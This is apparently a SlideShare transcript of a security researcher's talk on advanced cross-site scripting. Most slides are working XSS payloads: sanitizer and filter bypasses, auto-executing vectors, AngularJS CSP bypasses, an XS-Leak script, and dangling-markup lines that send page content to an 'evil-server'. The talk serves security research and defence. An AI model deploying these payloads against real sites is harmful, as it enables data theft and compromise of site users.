SlideShare a Scribd company logo

XSS Magic tricks

G
GarethHeyes

This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.

Technology
1 of 59
Download to read offline
XSS magic tricks Advancements in XSS By Gareth Heyes @garethheyes
• I ❤ hacking JavaScript
 
 
 
 
 
 
 
 • I'm a researcher at PortSwigger • Follow me on Twitter @garethheyes About me <a href=# name=x id=x>Click me on IE11</a> <script event="onclick(blah)<wtfbbq>{}" for=x> blah.view.alert(1) </script> <script event=onload for=window> return alert(2)};{ </script>
Hacking filters
• Consuming tags • title, noscript, style, script, noembed, textarea, plaintext, template, iframe, noframes
 
 
 
 • Template tag breaks out of select element <noframes> <img alt=" "> </noframes> <img alt=" "> </noframes> </noframes><script>alert(1)</script> Hacking filters <template><select><option></template><img src=1 onerror=alert(1)></select></template>
• Title exists in SVG and HTML • Title consumes markup in HTML but not in SVG • HTML in SVG? Hacking filters
Hacking filters <svg> <image> <title> <img title="</title><script>alert(1)</script>"> </title> </svg> 🚫
Hacking filters <svg> <img> <title> <img title="</title><script>alert(1)</script>"> </title> </svg> ✅
• Edge bug causes title mutate • E.g. 
 in: <title>&lt;img&gt;
 out:<title><img> • I used this bug to bypass DOMPurify • in: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
 out: <title></title><img src="1"> • What about double HTML encoded? • in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
 out: <title></title><img src=1 onerror=alert(1)></title> Hacking filters
• Invalid attributes
 <img ="/src/onerror=alert(1)//"> • HTML closing comments Firefox (version <=67)
 <!-- --!
 ><img src=1 onerror=alert(1)> --> • HTML opening comments Firefox (version 68.0.1)
 <!-[x00][x00][x00][x00][x00]- ><div title="--><img src=1 onerror=alert(1)>"></div> Hacking filters
• Firefox allows NULLs in entities • <a href="javascript&[0x00]#x6a;avascript:alert(1)">
 test</a> • <a href="javascript&[0x00]colon[0x00];alert(1)">
 test</a> Hacking filters
• Safari base tag • <base href="javascript:/a/-alert(1)///////"> • Turns every relative URL into XSS • <a href=../lol/safari.html>test</a> • <a href>haha</a> Hacking filters
XSS without parenthesis and semi-colons
• Everyone knows about alert`1` • I found you could do: onerror=alert;throw 1 • throw accepts a JavaScript expression XSS without parenthesis and semi-colons
• JavaScript expressions • x = (1,2);
 x//2 • Right hand side of expression is returned XSS without parenthesis and semi-colons
throw onerror=alert,'some string', 123,'haha' • First part of the expression is executed sets the error handler • Last part of the expression is sent to exception handler XSS without parenthesis and semi-colons
• How can you eval a string? • Prefixed with uncaught • Change it to an assignment
 
 throw onerror=eval,"=alertx281x29"
 //Uncaught = alert(1) XSS without parenthesis and semi-colons
{onerror=eval}
 throw{lineNumber:1, columnNumber:1,
 fileName:1,
 message:'alertx281x29'} • Firefox prefixes exception message with:
 uncaught exception: 1 • How can we get round this? XSS without parenthesis and semi-colons
Hidden inputs
• XSS in hidden input • Unexploitable when <> is filtered?
 <input type="hidden" value="XSS HERE"> • Access keys to the rescue! • "The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element." mdn Hidden inputs
• Firefox allows onclick event + access keys • <input type="hidden" accesskey="x" onclick="alert(1)">
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) • Firefox only but the technique can be used on Chrome Hidden inputs
Link elements
• Access keys can be used on Chrome • Hidden inputs don't work • Other elements link, meta etc do
 <link rel="canonical" accesskey="X" onclick="alert(1)" />
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) Link elements
Dangling markup
• Uses incomplete markup to extract parts of the page • <img src='//evil-server? • HTML parser finds an incomplete src attribute • Looks for ' to close the attribute Dangling markup
• Example dangling markup attacks • <table><tfoot background="//evil-server? • <link rel=icon href="//evil-server? • <video><source src="//evil? Dangling markup
• Chrome protects against dangling markup attacks • "Resource requests whose URLs contained both removed whitespace (`n`, `r`, `t`) characters and less-than characters (`<`) are blocked." https://www.chromestatus.com/feature/ 5735596811091968 • CSP will also block external requests if specified in the policy Dangling markup
• Bypassing restrictive CSP & Chrome mitigations • CSP: default-src 'none'; base-uri 'none'; • <base target=" • Sets target for every link • The markup will get passed in the window name Dangling markup
• <a href=//evil-server><font size=100 color=red>You must click me</font></a><base target=" • Anchor points to evil server • HTML styling is used to get round no inline styles • Target consumes all markup until the " is found • Clicking the link loads attackers server which reads window.name that contains the consumed markup Dangling markup
• Mitigation <base target="_self" /> • Prevents target being overwritten • Bypass requires 2 clicks • <input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/ font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></ button><form id=x target=" Dangling markup
Auto executing vectors
• Firefox onloadstart
 <img src=1 onloadstart=alert(1)> • Firefox onloadend
 <img src=1 onloadend=alert(1)> • <video><track default onload=alert(1) src="data:text/ vtt,WEBVTT"></video> Auto executing vectors
• Chrome
 <svg><discard onbegin=alert(1)> • Safari
 <svg><anything onload=alert(1)> • General svg 
 <svg><animate onbegin=alert(1) attributename=x dur=1s>
 <svg><set onend=alert(1) attributename=x dur=1s>
 <svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2> Auto executing vectors
• <body onpageshow=alert(1)> • <body onpopstate=alert(1)>
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com/#';flag=1}"> • <body onhashchange="alert(1)">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';window.flag=1;}"> • <body onmessage=alert(1)>
 <script>
 postMessage('test','*')
 </script> Auto executing vectors
• <body onbeforeunload="location='javascript:alert(1)'">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';flag=1}"> • <body onresize="alert(1)">
 <iframe src=//x-domain.com onload="this.style.width='1000px'"> • <body onscroll=alert(1)><div style=height:1000px></ div><div id=x></div> Auto executing vectors
• <style>
 @keyframes x{
 }
 </style>
 <b style="animation-name:x" onanimationstart="alert(1)"></b>
 <b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b> • Discovered by the legend Mario Heiderich • Executes on every tag but requires an injected style Auto executing vectors
• ontransitionend works on Chrome • <style>
 :target {
 color:red;
 }
 </style>
 <x id=x style="transition:color 1s" ontransitionend=alert(1)> • URL: page.html#x Auto executing vectors
• ontransitionrun works on Firefox • <style>
 :target {
 color:red;
 }
 </style>
 <x id=y style="transition:color 2s" ontransitionrun=alert(1)> • URL: page.html • URL: page.html#x Auto executing vectors
• Firefox ontransitioncancel • <style>
 :target {
 color: red;
 }
 </style>
 <x id=x style="transition:color 10s" ontransitioncancel=alert(1)> • URL: page.html# • URL: page.html#x • URL: page.html# Auto executing vectors
• Remember the classic vector?
 <input autofocus onfocus=alert(1)> • Autofocus required? • Nope 😀 <input onfocus=alert(1) id=x> • URL: page.html#x Auto executing vectors
• onblur becomes auto executable (Every browser except Firefox) • <input onblur=alert(1) id=x><input autofocus>
 <textarea onblur=alert(1) id=x></textarea><input autofocus>
 <button onblur=alert(1) id=x></button><input autofocus>
 <select onblur=alert(1) id=x></select><input autofocus> • URL: page.html#x • Focus events fire for iframes too • <body onblur=alert(1)><iframe id=x></iframe>
 <iframe id=x onblur=alert(1)></iframe><input autofocus> Auto executing vectors
• <embed id=x onfocus=alert(1) type=text/html> • <object id=x onfocus=alert(1) type=text/html> • <video id=x controls onfocus=alert(1)>
 <source src="validvideo.mp4" type=video/mp4>
 </video> • <audio id=x controls onfocus=alert(1) id=x>
 <source src="validaudio.wav">
 </audio> Auto executing vectors
AngularJS
• Standard AngularJS sandbox escape:
 {{constructor.constructor('alert(1)')()}} • Can we make it shorter? • {{$eval.constructor('alert(1)')()}} • Shorter still?
 {{$on.constructor('alert(1)')()}}
 //Credits Lewis Ardern AngularJS
• What if you can't call $eval? e.g. in a orderBy filter • Can't use strings • {{toString().constructor.prototype.charAt=[].join; [1,2]| orderBy:toString().constructor.fromCharCode(120,61,9 7,108,101,114,116,40,49,41)}} AngularJS
• CSP bypass for all versions of AngularJS • 63 characters! • <input id=x ng-focus=$event.path| orderBy:'CSS&&[1].map(alert)'> • page.html#x • Cross browser:
 <input id=x ng-focus=$event.composedPath()| orderBy:'CSS&&[1].map(alert)'> AngularJS
XS-Leak
• Focus event fires for iframe, input etc • Can we detect if this happens cross domain? • If it can be detected then id's can be bruteforced x-domain XS-Leak
• onblur event will be fired when cross domain element is focused • Hash can be checked multiple times with only 1 http request • Requires a frame-able page XS-Leak
XS-Leak Cross domain input element Same origin onblur event Same origin, shows current position <input id=1337> <body onblur="if(!window.found){window.found=true;alert('Found: '+pos)}"> <div id=y></div>
pos = 1000;found = false; var iframe = document.createElement('iframe');iframe.src='//x-domain.com'; document.body.appendChild(iframe);iframe.onload = next; function next() { if(!found){ document.getElementById('y').textContent = pos; iframe.src='//x-domain.com#'+pos; timer = setTimeout(function(){ if(!found && pos < 2000) { pos++; } next(); },50); } } //http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/ XS-Leak
Auto execute on every tag?
• "The tabindex global attribute indicates if its element can be focused, and if/where it participates in sequential keyboard navigation" mdn • <a onfocus=alert(1) id=x tabindex=1> • <div onfocus=alert(1) id=x tabindex=1> • <xss onfocus=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
• Works on pretty much every tag • Link works but requires display block • <link onfocus=alert(1) id=x tabindex=1 style=display:block> • Link works in the body but not head Auto execute on every tag?
• <a onfocusin=alert(1) id=x tabindex=1> • <div onfocusin=alert(1) id=x tabindex=1> • <xss onfocusin=alert(1) id=x tabindex=1> • <xss onfocusout=alert(1) id=x tabindex=1><input autofocus> • page.html#x Auto execute on every tag?
• IE activate/beforeactivate event • <a onactivate=alert(1) id=x tabindex=1> • <div onactivate=alert(1) id=x tabindex=1> • <xss onactivate=alert(1) id=x tabindex=1> • <xss onbeforeactivate=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
• IE deactivate/beforedeactivate event • <a ondeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • <xss ondeactivate=alert(1) id=x tabindex=1></ xss><input id=y autofocus> • <xss onbeforedeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • page.html#x • page.html#y Auto execute on every tag?
Questions? thanks and shout outs to @garethheyes James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski <img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">

Recommended

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 

Recommended

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrepNull Bhubaneswar
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSДмитрий Бумов
 

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrepNull Bhubaneswar
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhyd
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrep
 

Similar to XSS Magic tricks

Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
HTML5 New and Improved
HTML5 New and ImprovedHTML5 New and Improved
HTML5 New and ImprovedTimothy Fisher
 
Jquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript BasicsJquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript BasicsEPAM Systems
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)Thinkful
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)Sam Bowne
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
Xml part 6
Xml part 6Xml part 6
Xml part 6NOHA AW
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!Gill Cleeren
 

Similar to XSS Magic tricks (20)

Web application Security
Web application SecurityWeb application Security
Web application Security
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Rails Security
Rails SecurityRails Security
Rails Security
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
JavaScript
JavaScriptJavaScript
JavaScript
 
JavaScript
JavaScriptJavaScript
JavaScript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
HTML5 New and Improved
HTML5 New and ImprovedHTML5 New and Improved
HTML5 New and Improved
 
Jquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript BasicsJquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript Basics
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Build a game with javascript (may 21 atlanta)
